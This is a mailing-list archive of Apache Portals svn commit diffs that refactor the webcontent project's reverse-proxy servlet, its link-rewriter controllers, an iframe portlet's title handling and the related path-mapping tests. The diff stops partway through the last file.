portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/portlet/IFrameGenericPortlet.java URL: http://svn.apache.org/viewvc/portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/portlet/IFrameGenericPortlet.java?rev=821069&r1=821068&r2=821069&view=diff ============================================================================== --- portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/portlet/IFrameGenericPortlet.java (original) +++ portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/portlet/IFrameGenericPortlet.java Fri Oct 2 15:59:54 2009 @@ -172,7 +172,6 @@ @Override public void doView(RenderRequest request, RenderResponse response) throws PortletException, IOException { - setTitleByPreferences(request, response); String viewPage = (String) request.getAttribute(PARAM_VIEW_PAGE); if (viewPage != null) @@ -219,7 +218,6 @@ @Override public void doEdit(RenderRequest request, RenderResponse response) throws PortletException, IOException { - setTitleByPreferences(request, response); response.setContentType("text/html"); doPreferencesEdit(request, response); } @@ -227,14 +225,12 @@ @Override public void doHelp(RenderRequest request, RenderResponse response) throws PortletException, IOException { - setTitleByPreferences(request, response); super.doHelp(request, response); } @Override public void doCustom(RenderRequest request, RenderResponse response) throws PortletException, IOException { - setTitleByPreferences(request, response); super.doCustom(request, response); } @@ -405,14 +401,19 @@ } } - protected void setTitleByPreferences(RenderRequest request, RenderResponse response) + @Override + protected String getTitle(RenderRequest request) { String title = getAttributePreference(request.getPreferences(), "TITLE"); if (!StringUtils.isEmpty(title)) { - response.setTitle(title); + return title; + } + else + { + return super.getTitle(request); } } - + } Modified: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyServlet.java URL: http://svn.apache.org/viewvc/portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyServlet.java?rev=821069&r1=821068&r2=821069&view=diff ============================================================================== --- portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyServlet.java (original) +++ portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/DefaultHttpReverseProxyServlet.java Fri Oct 2 15:59:54 2009 @@ -163,6 +163,11 @@ String localBasePath = pathPassConf.getString("local"); String remoteBaseURL = pathPassConf.getString("remote"); + if (StringUtils.isBlank(localBasePath) || StringUtils.isBlank(remoteBaseURL)) + { + log.error("Wrong configuration for pass mapping of " + pathName + ". local={}, remove={}.", localBasePath, remoteBaseURL); + } + try { HttpReverseProxyPathMapper proxyPathMapper = Modified: portals/applications/webcontent/trunk/webcontent-war/src/main/webapp/WEB-INF/conf/reverseproxy.properties URL: http://svn.apache.org/viewvc/portals/applications/webcontent/trunk/webcontent-war/src/main/webapp/WEB-INF/conf/reverseproxy.properties?rev=821069&r1=821068&r2=821069&view=diff ============================================================================== --- portals/applications/webcontent/trunk/webcontent-war/src/main/webapp/WEB-INF/conf/reverseproxy.properties (original) +++ portals/applications/webcontent/trunk/webcontent-war/src/main/webapp/WEB-INF/conf/reverseproxy.properties Fri Oct 2 15:59:54 2009 @@ -43,16 +43,13 @@ # HTTP Connection parameters per route. # ... If you don't specify here for a route, then the default values are applied. # ... Put the route item names here. -proxy.http.route = apache, portals, somewhere +proxy.http.route = apache, somewhere proxy.http.route.param.defaultMaxPerRoute = 20 # ... Sets detail attirbutes for each route item. proxy.http.route.apache.target.hostname = www.apache.org -proxy.http.route.apache.maxConnections = 10 - -proxy.http.route.portals.target.hostname = portals.apache.org -proxy.http.route.portals.maxConnections = 40 +proxy.http.route.apache.maxConnections = 40 # ... 'somewhere' is just an example to show the full configurable items... proxy.http.route.somewhere.target.hostname = somewhere.localhost.com @@ -71,7 +68,7 @@ # Proxy Pass Reverse Mapping configurations for each category # ... Put the path item names here. Each path item will be evaluated by the order. -proxy.reverse.pass = apache, portals, localhost, somewhere +proxy.reverse.pass = apache, localhost, somewhere # ... Sets detail attributes for each path item. @@ -81,7 +78,7 @@ proxy.reverse.pass.apache.rewriter.parserAdaptor = html # ... SimpleLinkRewritingParserAaptor rewrites links only based on its remote base URLs, # ... while PassMappingLinkRewritingParserAaptor rewrites links based on all reverse proxy pass mappings. -#proxy.reverse.pass.portals.rewriter.parserAdaptor.html = org.apache.portals.applications.webcontent.proxy.impl.SimpleLinkRewritingParserAaptor +#proxy.reverse.pass.apache.rewriter.parserAdaptor.html = org.apache.portals.applications.webcontent.proxy.impl.SimpleLinkRewritingParserAaptor proxy.reverse.pass.apache.rewriter.parserAdaptor.html = org.apache.portals.applications.webcontent.proxy.impl.PassMappingLinkRewritingParserAaptor proxy.reverse.pass.apache.rewriter.parserAdaptor.html.mimeType = text/html From [email protected] Mon Oct 05 17:51:13 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 61492 invoked from network); 5 Oct 2009 17:51:13 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 5 Oct 2009 17:51:13 -0000 Received: (qmail 26396 invoked by uid 500); 5 Oct 2009 17:51:13 -0000 Delivered-To: [email protected] Received: (qmail 26362 invoked by uid 500); 5 Oct 2009 17:51:12 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <portalapps-dev.portals.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 26349 invoked by uid 99); 5 Oct 2009 17:51:12 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 05 Oct 2009 17:51:12 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 05 Oct 2009 17:51:00 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 8296323888EA; Mon, 5 Oct 2009 17:50:08 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r821934 [2/2] - in /portals/applications/webcontent/trunk: webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/ webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/ webcontent-jar/src... Date: Mon, 05 Oct 2009 17:50:07 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Modified: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/RewritableHttpReverseProxyServiceImpl.java URL: http://svn.apache.org/viewvc/portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/RewritableHttpReverseProxyServiceImpl.java?rev=821934&r1=821933&r2=821934&view=diff ============================================================================== --- portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/RewritableHttpReverseProxyServiceImpl.java (original) +++ portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/proxy/impl/RewritableHttpReverseProxyServiceImpl.java Mon Oct 5 17:50:07 2009 @@ -26,6 +26,7 @@ import java.util.ArrayList; import java.util.Enumeration; import java.util.List; +import java.util.Map; import java.util.zip.GZIPInputStream; import java.util.zip.GZIPOutputStream; @@ -67,6 +68,8 @@ import org.apache.http.protocol.HTTP; import org.apache.http.util.EntityUtils; import org.apache.portals.applications.webcontent.proxy.HttpReverseProxyConstants; +import org.apache.portals.applications.webcontent.proxy.HttpReverseProxyException; +import org.apache.portals.applications.webcontent.proxy.HttpReverseProxyNotFoundException; import org.apache.portals.applications.webcontent.proxy.HttpReverseProxyPathMapper; import org.apache.portals.applications.webcontent.proxy.HttpReverseProxyPathMapperProvider; import org.apache.portals.applications.webcontent.proxy.HttpReverseProxyService; @@ -173,7 +176,7 @@ } } - public void invoke(HttpServletRequest request, HttpServletResponse response) throws IOException + public void invoke(HttpServletRequest request, HttpServletResponse response) throws HttpReverseProxyException, IOException { // proxyPathMapper can be injected by using request attribute. HttpReverseProxyPathMapper proxyPathMapper = (HttpReverseProxyPathMapper) request.getAttribute(HttpReverseProxyConstants.PATH_MAPPER); @@ -192,7 +195,7 @@ if (proxyPathMapper == null) { - throw new IOException("Proxy configuration is not defined for " + localPathInfo); + throw new HttpReverseProxyNotFoundException("Proxy configuration is not defined for " + localPathInfo); } if (hostHeaderValue == null) @@ -211,7 +214,7 @@ if (proxyTargetURL == null) { - throw new IllegalStateException("Cannot translate the location path info into remote URL. " + localPathInfo); + throw new HttpReverseProxyNotFoundException("Cannot translate the location path info into remote URL. " + localPathInfo); } String queryString = request.getQueryString(); @@ -275,7 +278,7 @@ } else { - throw new IOException("Unsupported method: " + method); + throw new HttpReverseProxyException("Unsupported method: " + method); } // set sso credentials if available @@ -321,6 +324,16 @@ } } + Map<String, String> defaultRequestHeaders = proxyPathMapper.getDefaultRequestHeaders(); + + if (defaultRequestHeaders != null) + { + for (Map.Entry<String, String> entry : defaultRequestHeaders.entrySet()) + { + httpRequest.setHeader(entry.getKey(), entry.getValue()); + } + } + HttpEntity httpEntity = null; try @@ -344,7 +357,7 @@ if (location == null) { - throw new IOException("Recieved status code: " + statusCode + " but no " + HttpReverseProxyConstants.HTTP_HEADER_LOCATION + " header was found in the response"); + throw new HttpReverseProxyException("Recieved status code is " + statusCode + " but no " + HttpReverseProxyConstants.HTTP_HEADER_LOCATION + " header was found in the response"); } // Modify the redirect to go to this proxy servlet rather that the proxied host @@ -407,12 +420,33 @@ if (httpEntity != null) { + boolean rewritable = false; + Rewriter rewriter = null; + ParserAdaptor parserAdaptor = null; + + RewriterController rewriterController = proxyPathMapperProvider.getRewriterController(proxyPathMapper); + + if (rewriterController != null) + { + parserAdaptor = createParserAdaptor(rewriterController, httpEntity); + + if (parserAdaptor != null) + { + rewriter = createRewriter(rewriterController, proxyPathMapper); + rewritable = (rewriter != null); + } + } + // Pass response headers back to the client Header [] headerArrayResponse = httpResponse.getAllHeaders(); for (Header header : headerArrayResponse) { String headerName = header.getName(); + + if (rewritable && StringUtils.equalsIgnoreCase(headerName, HTTP.CONTENT_LEN)) + continue; + String headerValue = header.getValue(); if (StringUtils.equalsIgnoreCase(headerName, HTTP.TARGET_HOST)) @@ -432,10 +466,26 @@ } // Send the content to the client - writeHttpEntityToClient(request, response, httpEntity, proxyPathMapper, rewriterContextPath, localPathInfo); + writeHttpEntityToClient(response, httpEntity, proxyPathMapper, rewriterContextPath, localPathInfo, rewriter, parserAdaptor); } } } + catch (IOException e) + { + if (log.isDebugEnabled()) + { + log.error("IOException occurred during execution for " + proxyTargetURL, e); + } + else + { + log.error("IOException occurred during execution for {} {}", proxyTargetURL, e); + } + + httpRequest.abort(); + httpEntity = null; + + throw e; + } catch (Exception e) { if (log.isDebugEnabled()) @@ -450,7 +500,7 @@ httpRequest.abort(); httpEntity = null; - throw new IOException(e.toString()); + throw new HttpReverseProxyException(e); } finally { @@ -461,11 +511,13 @@ } } - private void writeHttpEntityToClient(HttpServletRequest request, HttpServletResponse response, + private void writeHttpEntityToClient(HttpServletResponse response, HttpEntity httpEntity, HttpReverseProxyPathMapper proxyPathMapper, String rewriterContextPath, - String localPathInfo) throws IOException + String localPathInfo, + Rewriter rewriter, + ParserAdaptor parserAdaptor) throws Exception { InputStream in = null; Reader reader = null; @@ -481,127 +533,48 @@ if (in != null) { out = response.getOutputStream(); - - RewriterController rewriterController = proxyPathMapperProvider.getRewriterController(proxyPathMapper); - Rewriter rewriter = null; - if (rewriterController != null) - { - Ruleset rewriterRuleset = proxyPathMapperProvider.getRewriterRuleset(proxyPathMapper); - - if (rewriterRuleset == null) - { - rewriter = rewriterController.createRewriter(); - } - else - { - rewriter = rewriterController.createRewriter(rewriterRuleset); - } - } - - if (rewriterController == null || rewriter == null) + if (rewriter == null || parserAdaptor == null) { IOUtils.copy(in, out); out.flush(); } else { - String mimeType = "text/html"; - String contentType = null; - Header contentTypeHeader = httpEntity.getContentType(); + boolean gzipEncoded = false; + Header contentEncodingHeader = httpEntity.getContentEncoding(); - if (contentTypeHeader != null) + if (contentEncodingHeader != null) { - contentType = contentTypeHeader.getValue(); + gzipEncoded = StringUtils.equalsIgnoreCase("gzip", contentEncodingHeader.getValue()); } - if (contentType != null) + if (parserAdaptor instanceof ReverseProxyRewritingContextAware) { - int offset = contentType.indexOf(';'); - - if (offset > 0) - { - mimeType = contentType.substring(0, offset).trim(); - } - else - { - mimeType = contentType; - } + ReverseProxyRewritingContext rewritingContext = + new DefaultReverseProxyRewritingContext(proxyPathMapper, proxyPathMapperProvider, rewriterContextPath); + ((ReverseProxyRewritingContextAware) parserAdaptor).setReverseProxyRewritingContext(rewritingContext); } - ParserAdaptor parserAdaptor = null; + String responseCharSet = EntityUtils.getContentCharSet(httpEntity); - try + if (responseCharSet != null) { - parserAdaptor = rewriterController.createParserAdaptor(mimeType); - } - catch (Exception e) - { - if (log.isDebugEnabled()) - { - log.error("Failed to create parser adaptor.", e); - } - else - { - log.error("Failed to create parser adaptor. {}", e.toString()); - } - } - - if (parserAdaptor == null) - { - IOUtils.copy(in, out); - out.flush(); + reader = new InputStreamReader(gzipEncoded ? new GZIPInputStream(in) : in, responseCharSet); + writer = new OutputStreamWriter(gzipEncoded ? new GZIPOutputStream(out) : out, responseCharSet); } else { - boolean gzipEncoded = false; - Header contentEncodingHeader = httpEntity.getContentEncoding(); - - if (contentEncodingHeader != null) - { - gzipEncoded = StringUtils.equalsIgnoreCase("gzip", contentEncodingHeader.getValue()); - } - - if (parserAdaptor instanceof ReverseProxyRewritingContextAware) - { - ReverseProxyRewritingContext rewritingContext = - new DefaultReverseProxyRewritingContext(proxyPathMapper, proxyPathMapperProvider, rewriterContextPath); - ((ReverseProxyRewritingContextAware) parserAdaptor).setReverseProxyRewritingContext(rewritingContext); - } - - String responseCharSet = EntityUtils.getContentCharSet(httpEntity); - - if (responseCharSet != null) - { - reader = new InputStreamReader(gzipEncoded ? new GZIPInputStream(in) : in, responseCharSet); - writer = new OutputStreamWriter(gzipEncoded ? new GZIPOutputStream(out) : out, responseCharSet); - } - else - { - reader = new InputStreamReader(gzipEncoded ? new GZIPInputStream(in) : in); - writer = new OutputStreamWriter(gzipEncoded ? new GZIPOutputStream(out) : out); - } - - rewriter.setBaseUrl(rewriterContextPath + localPathInfo); - rewriter.rewrite(parserAdaptor, reader, writer); - writer.flush(); + reader = new InputStreamReader(gzipEncoded ? new GZIPInputStream(in) : in); + writer = new OutputStreamWriter(gzipEncoded ? new GZIPOutputStream(out) : out); } + + rewriter.setBaseUrl(rewriterContextPath + localPathInfo); + rewriter.rewrite(parserAdaptor, reader, writer); + writer.flush(); } } } - catch (Exception e) - { - if (log.isDebugEnabled()) - { - log.error("Exception occurred during writing content.", e); - } - else - { - log.error("Exception occurred during writing content. {}", e.toString()); - } - - throw new IOException(e.getLocalizedMessage()); - } finally { if (reader != null) @@ -623,6 +596,46 @@ } } + private Rewriter createRewriter(RewriterController rewriterController, HttpReverseProxyPathMapper proxyPathMapper) throws Exception + { + Ruleset rewriterRuleset = proxyPathMapperProvider.getRewriterRuleset(proxyPathMapper); + + if (rewriterRuleset == null) + { + return rewriterController.createRewriter(); + } + else + { + return rewriterController.createRewriter(rewriterRuleset); + } + } + + private ParserAdaptor createParserAdaptor(RewriterController rewriterController, HttpEntity httpEntity) throws Exception + { + String contentType = null; + Header contentTypeHeader = httpEntity.getContentType(); + + if (contentTypeHeader != null) + { + contentType = contentTypeHeader.getValue(); + } + + if (contentType == null) + { + return null; + } + + String mimeType = contentType; + int offset = mimeType.indexOf(';'); + + if (offset > 0) + { + mimeType = mimeType.substring(0, offset).trim(); + } + + return rewriterController.createParserAdaptor(mimeType); + } + private List<SSOSiteCredentials> getSSOSiteCredentials(String siteURL, DefaultHttpClient httpClient, HttpServletRequest request) { SSOSiteCredentialsProvider credsProvider = (SSOSiteCredentialsProvider) request.getAttribute(HttpReverseProxyConstants.SSO_SITE_CREDENTIALS_PROVIDER); Added: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/rewriter/AbstractTextLinesParserAdaptor.java URL: http://svn.apache.org/viewvc/portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/rewriter/AbstractTextLinesParserAdaptor.java?rev=821934&view=auto ============================================================================== --- portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/rewriter/AbstractTextLinesParserAdaptor.java (added) +++ portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/rewriter/AbstractTextLinesParserAdaptor.java Mon Oct 5 17:50:07 2009 @@ -0,0 +1,74 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package org.apache.portals.applications.webcontent.rewriter; + +import java.io.BufferedWriter; +import java.io.PrintWriter; +import java.io.Reader; +import java.io.Writer; + +import org.apache.commons.io.IOUtils; +import org.apache.commons.io.LineIterator; +import org.apache.commons.lang.StringUtils; +import org.slf4j.Logger; +import org.slf4j.LoggerFactory; + + +/** + * AbstractTextLinesParserAdaptor + * + * @version $Id$ + */ +public abstract class AbstractTextLinesParserAdaptor implements ParserAdaptor +{ + + private static Logger log = LoggerFactory.getLogger(AbstractTextLinesParserAdaptor.class); + + public void rewrite(Rewriter rewriter, Reader reader, Writer writer) throws RewriterException + { + PrintWriter out = new PrintWriter(new BufferedWriter(writer)); + + for (LineIterator lineIt = IOUtils.lineIterator(reader); lineIt.hasNext(); ) + { + String line = lineIt.nextLine(); + + if (!StringUtils.isBlank(line)) + { + try + { + line = rewriteLine(line); + } + catch (Exception e) + { + log.warn("Error during {}: {}", "replacement", e); + } + } + + out.println(line); + } + + out.flush(); + } + + protected abstract String rewriteLine(String line) throws Exception; + + public void parse(Rewriter rewriter, Reader reader) throws RewriterException + { + throw new UnsupportedOperationException("Text lines parser adaptor does not support parse() method."); + } + +} Propchange: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/rewriter/AbstractTextLinesParserAdaptor.java ------------------------------------------------------------------------------ svn:eol-style = native Propchange: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/rewriter/AbstractTextLinesParserAdaptor.java ------------------------------------------------------------------------------ svn:keywords = Id Propchange: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/rewriter/AbstractTextLinesParserAdaptor.java ------------------------------------------------------------------------------ svn:mime-type = text/plain Modified: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/rewriter/MappingClasspathRewriterController.java URL: http://svn.apache.org/viewvc/portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/rewriter/MappingClasspathRewriterController.java?rev=821934&r1=821933&r2=821934&view=diff ============================================================================== --- portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/rewriter/MappingClasspathRewriterController.java (original) +++ portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/rewriter/MappingClasspathRewriterController.java Mon Oct 5 17:50:07 2009 @@ -21,6 +21,7 @@ import java.io.InputStreamReader; import java.io.Reader; import java.util.List; +import java.util.Map; import org.slf4j.Logger; import org.slf4j.LoggerFactory; @@ -42,6 +43,12 @@ { super(mappingFile); } + + public MappingClasspathRewriterController( String mappingFile, Class basicRewriterClass, Class ruleBasedRewriterClass, Map<String, Class> adaptorMimeTypeClassMap ) + throws RewriterException + { + super(mappingFile, basicRewriterClass, ruleBasedRewriterClass, adaptorMimeTypeClassMap); + } public MappingClasspathRewriterController( String mappingFile, List rewriterClasses, List adaptorClasses ) throws RewriterException Modified: portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/rewriter/MappingRewriterController.java URL: http://svn.apache.org/viewvc/portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/rewriter/MappingRewriterController.java?rev=821934&r1=821933&r2=821934&view=diff ============================================================================== --- portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/rewriter/MappingRewriterController.java (original) +++ portals/applications/webcontent/trunk/webcontent-jar/src/main/java/org/apache/portals/applications/webcontent/rewriter/MappingRewriterController.java Mon Oct 5 17:50:07 2009 @@ -19,6 +19,7 @@ import java.io.File; import java.io.InputStream; import java.io.Reader; +import java.lang.reflect.InvocationTargetException; import java.util.ArrayList; import java.util.Collections; import java.util.HashMap; @@ -28,6 +29,7 @@ import javax.xml.parsers.DocumentBuilder; import javax.xml.parsers.DocumentBuilderFactory; +import org.apache.commons.beanutils.BeanUtils; import org.apache.portals.applications.webcontent.rewriter.html.SwingParserAdaptor; import org.apache.portals.applications.webcontent.rewriter.rules.Ruleset; import org.apache.portals.applications.webcontent.rewriter.xml.SaxParserAdaptor; @@ -65,13 +67,22 @@ /** configured basic rewriter class */ protected Class basicRewriterClass = BasicRewriter.class; - + /** configured ruleset rewriter class */ protected Class rulesetRewriterClass = RulesetRewriterImpl.class; /** Adaptors */ protected Map<String, Class> parserAdaptorMimeTypeClassMap; - + + /** Basic rewriter instance properties */ + protected Map<String, Object> basicRewriterProps; + + /** Ruleset rewriter instance properties */ + protected Map<String, Object> rulesetRewriterProps; + + /** Parser adaptor rewriter instance properties map */ + protected Map<String, Map<String, Object>> parserAdaptorMimeTypePropsMap; + public MappingRewriterController( String mappingFile ) throws RewriterException { this.mappingFile = mappingFile; @@ -181,7 +192,24 @@ public Rewriter createRewriter() throws InstantiationException, IllegalAccessException { - return (Rewriter) basicRewriterClass.newInstance(); + Rewriter rewriter = (Rewriter) basicRewriterClass.newInstance(); + + try + { + if (basicRewriterProps != null) + { + for (Map.Entry<String, Object> entry : basicRewriterProps.entrySet()) + { + BeanUtils.setProperty(rewriter, entry.getKey(), entry.getValue()); + } + } + } + catch (InvocationTargetException e) + { + throw new RuntimeException(e); + } + + return rewriter; } public RulesetRewriter createRewriter( Ruleset ruleset ) throws RewriterException @@ -190,6 +218,22 @@ { RulesetRewriter rewriter = (RulesetRewriter) rulesetRewriterClass.newInstance(); rewriter.setRuleset(ruleset); + + try + { + if (rulesetRewriterProps != null) + { + for (Map.Entry<String, Object> entry : rulesetRewriterProps.entrySet()) + { + BeanUtils.setProperty(rewriter, entry.getKey(), entry.getValue()); + } + } + } + catch (InvocationTargetException e) + { + throw new RuntimeException(e); + } + return rewriter; } catch (Exception e) @@ -203,12 +247,35 @@ { try { + ParserAdaptor parserAdaptor = null; Class parserAdaptorClass = parserAdaptorMimeTypeClassMap.get(mimeType); if (parserAdaptorClass != null) { - return (ParserAdaptor) parserAdaptorClass.newInstance(); + parserAdaptor = (ParserAdaptor) parserAdaptorClass.newInstance(); + + try + { + if (parserAdaptorMimeTypePropsMap != null) + { + Map<String, Object> parserAdaptorProps = parserAdaptorMimeTypePropsMap.get(mimeType); + + if (parserAdaptorProps != null) + { + for (Map.Entry<String, Object> entry : parserAdaptorProps.entrySet()) + { + BeanUtils.setProperty(parserAdaptor, entry.getKey(), entry.getValue()); + } + } + } + } + catch (InvocationTargetException e) + { + throw new RuntimeException(e); + } } + + return parserAdaptor; } catch (Exception e) { @@ -229,17 +296,28 @@ throw new RewriterException("The mapping file is not set."); } - File file = new File(this.mappingFile); - - if (!file.isFile()) - { - throw new RewriterException("The mapping file is not available: " + this.mappingFile); - } + Reader reader = getReader(this.mappingFile); try { - this.mapper = new Mapping(); - this.mapper.loadMapping(file.toURL()); + if (reader == null && this.mappingFile != null) + { + File file = new File(this.mappingFile); + + if (!file.isFile()) + { + throw new RewriterException("The mapping file is not available: " + this.mappingFile); + } + + this.mapper = new Mapping(); + this.mapper.loadMapping(file.toURL()); + } + else + { + InputSource is = new InputSource(reader); + is.setSystemId(this.mappingFile); + this.mapper.loadMapping(is); + } } catch (Exception e) { @@ -307,5 +385,40 @@ return ruleset; } + + public Map<String, Object> getBasicRewriterProps() + { + return basicRewriterProps; + } + + public void setBasicRewriterProps(Map<String, Object> props) + { + basicRewriterProps = props; + } + + public Map<String, Object> getRulesetRewriterProps() + { + return rulesetRewriterProps; + } + + public void setRulesetRewriterProps(Map<String, Object> props) + { + rulesetRewriterProps = props; + } + + public Map<String, Map<String, Object>> getParserAdaptorMimeTypePropsMap() + { + return parserAdaptorMimeTypePropsMap; + } + + public void setParserAdaptorMimeTypePropsMap(Map<String, Map<String, Object>> propsMap) + { + parserAdaptorMimeTypePropsMap = propsMap; + } + + protected Reader getReader(String resourcePath) throws RewriterException + { + return null; + } } \ No newline at end of file Modified: portals/applications/webcontent/trunk/webcontent-jar/src/test/java/org/apache/portals/applications/webcontent/proxy/TestProxyPathMappings.java URL: http://svn.apache.org/viewvc/portals/applications/webcontent/trunk/webcontent-jar/src/test/java/org/apache/portals/applications/webcontent/proxy/TestProxyPathMappings.java?rev=821934&r1=821933&r2=821934&view=diff ============================================================================== --- portals/applications/webcontent/trunk/webcontent-jar/src/test/java/org/apache/portals/applications/webcontent/proxy/TestProxyPathMappings.java (original) +++ portals/applications/webcontent/trunk/webcontent-jar/src/test/java/org/apache/portals/applications/webcontent/proxy/TestProxyPathMappings.java Mon Oct 5 17:50:07 2009 @@ -35,7 +35,7 @@ */ public class TestProxyPathMappings extends TestCase { - private HttpReverseProxyPathMapperProvider pathMapperProvider; + private DefaultHttpReverseProxyPathMapperProviderImpl pathMapperProvider; @Override public void setUp() @@ -43,9 +43,13 @@ Map<HttpReverseProxyPathMapper, RewriterController> rewriterControllerMap = new HashMap<HttpReverseProxyPathMapper, RewriterController>(); Map<HttpReverseProxyPathMapper, Ruleset> rewriterRulesetMap = new HashMap<HttpReverseProxyPathMapper, Ruleset>(); List<HttpReverseProxyPathMapper> proxyPathMappers = new ArrayList<HttpReverseProxyPathMapper>(); - proxyPathMappers.add(new DefaultHttpReverseProxyPathMapperImpl("localhost", "/localhost/", "http://www.localhost.com/")); - proxyPathMappers.add(new DefaultHttpReverseProxyPathMapperImpl("apache", "/*_apache/", "http://$1.apache.org/")); + proxyPathMappers.add(new DefaultHttpReverseProxyPathMapperImpl("localhost", "/localhost/", "http://www.localhost.com/", null)); + proxyPathMappers.add(new DefaultHttpReverseProxyPathMapperImpl("localhost1", "/localhost/path1/", "http://www.localhost.com/path1/", null)); + proxyPathMappers.add(new DefaultHttpReverseProxyPathMapperImpl("localhost2", "/localhost/path1/path2/", "http://www.localhost.com/path1/path2/", null)); + proxyPathMappers.add(new DefaultHttpReverseProxyPathMapperImpl("apache", "/*_apache/", "http://$1.apache.org/", null)); + proxyPathMappers.add(new DefaultHttpReverseProxyPathMapperImpl("apache", "/*.google.*/", "http://$1.google.$2/", null)); pathMapperProvider = new DefaultHttpReverseProxyPathMapperProviderImpl(proxyPathMappers, rewriterControllerMap, rewriterRulesetMap); + pathMapperProvider.setMaxMatchingPathPartCount(3); } public void testProxyPathMappings() throws Exception @@ -80,8 +84,26 @@ mapper = pathMapperProvider.findMapperByRemoteURL("http://portals.apache.org/index.html"); assertEquals("/portals_apache/", mapper.getLocalBasePath()); + mapper = pathMapperProvider.findMapperByRemoteURL("http://www.localhost.com/path1/path2/index.html"); + assertEquals("/localhost/path1/path2/", mapper.getLocalBasePath()); + + mapper = pathMapperProvider.findMapperByRemoteURL("http://www.localhost.com/path1/index.html"); + assertEquals("/localhost/path1/", mapper.getLocalBasePath()); + mapper = pathMapperProvider.findMapperByRemoteURL("http://www.localhost.com/index.html"); assertEquals("/localhost/", mapper.getLocalBasePath()); + + mapper = pathMapperProvider.findMapperByRemoteURL("http://www.localhost.com/path2/index.html"); + assertEquals("/localhost/", mapper.getLocalBasePath()); + + mapper = pathMapperProvider.findMapperByRemoteURL("http://www.localhost.com"); + assertEquals("/localhost/", mapper.getLocalBasePath()); + + mapper = pathMapperProvider.findMapperByRemoteURL("http://www.google.com/"); + assertEquals("/www.google.com/", mapper.getLocalBasePath()); + + mapper = pathMapperProvider.findMapperByRemoteURL("http://images.google.com/query?q=1/"); + assertEquals("/images.google.com/", mapper.getLocalBasePath()); } } Modified: portals/applications/webcontent/trunk/webcontent-jar/src/test/java/org/apache/portals/applications/webcontent/proxy/TestReverseProxyLinkRewritingParserAaptor.java URL: http://svn.apache.org/viewvc/portals/applications/webcontent/trunk/webcontent-jar/src/test/java/org/apache/portals/applications/webcontent/proxy/TestReverseProxyLinkRewritingParserAaptor.java?rev=821934&r1=821933&r2=821934&view=diff ============================================================================== --- portals/applications/webcontent/trunk/webcontent-jar/src/test/java/org/apache/portals/applications/webcontent/proxy/TestReverseProxyLinkRewritingParserAaptor.java (original) +++ portals/applications/webcontent/trunk/webcontent-jar/src/test/java/org/apache/portals/applications/webcontent/proxy/TestReverseProxyLinkRewritingParserAaptor.java Mon Oct 5 17:50:07 2009 @@ 